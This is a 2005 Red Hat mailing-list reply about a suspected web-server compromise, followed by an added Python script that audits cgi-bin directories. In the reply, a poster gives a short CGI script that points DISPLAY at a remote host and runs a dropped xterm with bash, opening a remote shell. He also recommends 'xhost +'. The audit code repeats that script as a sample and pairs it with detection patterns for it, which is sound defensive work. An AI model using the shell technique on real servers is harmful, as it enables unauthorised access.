> -----Original Message-----
> From: redhat-list-bounces@xxxxxxxxxx [mailto:redhat-list-bounces@xxxxxxxxxx] On Behalf Of Chris Kenward
> Sent: Monday, April 11, 2005 8:15 AM
> To: 'General Red Hat Linux discussion list'
> Subject: RE: Blackhole
>
> Hi there, Tom
>
> > Is it possible that you have some shell accounts on your system
> > and that one of your users is trying to run this? The C code by
> > itself won't harm anything, and from what you say, it does not
> > appear to have been compiled. Perhaps just upgrading to the newest
> > apache will fix? Looking at the links provided below seem to
> > indicate that the executable must be run, to try to break the apache
> > server through the listed port. I've seen this attempt many times
> > on my machine, & AFAIK, it's never been successful.
>
> I don't think anyone local to the machine would do something like that - we
> only allow FTP access to the server and no users have telnet or SSH
> access.

Shell access is not necessary; the web server itself can essentially serve as a shell. It is easy enough to write a CGI script to execute all the commands necessary. Hell, even getting a shell is trivial:

First we grab an xterm binary from a compatible system and drop it wherever we have access to, set permissions, yada yada yada. Unless of course the admin was kind enough to install it for us, which I have seen plenty of times. We will name the following script xterm.cgi, or whatever extension you have set to execute, and drop it into my web site's cgi-bin directory. Of course this will not work if the web server is properly firewalled, which in my experience they hardly ever are.

#!/bin/bash
export DISPLAY=xxx.xxx.xxx.xxx:0.0
/tmp/xterm -e /bin/bash

If you try this, don't forget to add the host to your X server's ACL, or simply run xhost +.

A web server will let you do just about anything you want ...

-Tobias

> The Apache web server is latest version from the RHN (2.0?)
>
> I've taken the bull by the proverbials and deleted the file called
> "blackhole". Can't find anything else suspicious and looking through the
> various ports that are active doesn't really show anything suspicious.
>
> Whew?
>
> Regards
> Chris
>
>
> --
> redhat-list mailing list
> unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
> https://www.redhat.com/mailman/listinfo/redhat-list

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
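The point Tobias makes is that a writable cgi-bin turns the web server into a command channel, and the script he quotes has a recognisable shape: it sets DISPLAY to a remote host, runs a terminal emulator, and executes a binary dropped in /tmp. The following is an added example, not code from the list or from Red Hat, showing how an administrator in Chris's position could audit a cgi-bin directory for scripts with that shape and for world-writable scripts. The indicator names, the `classify` thresholds, the sample CGI files, and the 203.0.113.5 address (a documentation-range placeholder) are all constructed for this example.

```python
"""Audit a cgi-bin directory for CGI scripts that look like the remote-xterm
script quoted in the thread. Added example; not code from the list posting."""
import os
import re
import stat
import tempfile

# Indicators generalised from the quoted script: a remote X display, a terminal
# emulator spawned from CGI, and anything executed out of a scratch directory.
INDICATORS = {
    "sets_display": re.compile(r"\bDISPLAY\s*="),
    "spawns_terminal": re.compile(r"\b(xterm|rxvt|gnome-terminal)\b"),
    "runs_from_tmp": re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/\S+"),
}

# Constructed sample CGI scripts: the quoted one (with a placeholder address)
# and a benign one that only emits a text response.
SUSPECT_CGI = """#!/bin/bash
export DISPLAY=203.0.113.5:0.0
/tmp/xterm -e /bin/bash
"""
BENIGN_CGI = """#!/bin/bash
echo "Content-Type: text/plain"
echo
echo "hello"
"""


def audit_cgi_file(path):
    """Return the list of indicator names that matched in one CGI file."""
    findings = []
    try:
        with open(path, "r", errors="replace") as fh:
            text = fh.read()
    except OSError:
        return ["unreadable"]
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            findings.append(name)
    # A CGI script anyone can overwrite is a problem regardless of content.
    if os.stat(path).st_mode & stat.S_IWOTH:
        findings.append("world_writable")
    return findings


def audit_cgi_dir(directory):
    """Map each executable regular file in the directory to its findings."""
    report = {}
    for entry in sorted(os.listdir(directory)):
        path = os.path.join(directory, entry)
        if not os.path.isfile(path):
            continue
        # Use the mode bits rather than os.access so noexec mounts do not hide files.
        if not os.stat(path).st_mode & stat.S_IXUSR:
            continue
        report[entry] = audit_cgi_file(path)
    return report


def classify(findings):
    """Constructed triage rule: two or more indicators, or a world-writable
    script, is suspicious; one indicator deserves a look; none is clean."""
    if "world_writable" in findings or len(findings) >= 2:
        return "suspicious"
    if findings:
        return "review"
    return "clean"


def write_sample_cgi_bin():
    """Create a temporary cgi-bin holding the two constructed sample scripts."""
    directory = tempfile.mkdtemp(prefix="cgi-audit-")
    for name, body in (("xterm.cgi", SUSPECT_CGI), ("hello.cgi", BENIGN_CGI)):
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, 0o755)
    return directory


if __name__ == "__main__":
    cgi_bin = write_sample_cgi_bin()
    for script, findings in audit_cgi_dir(cgi_bin).items():
        print(f"{script}: {classify(findings)} {findings}")
```

Run it against a real cgi-bin by calling `audit_cgi_dir("/var/www/cgi-bin")` in place of the constructed directory. The content checks are only a first pass; the control Tobias himself names, an egress firewall on the web server that drops outbound connections the server has no business making (such as to a remote X display), is what actually stops the script from working.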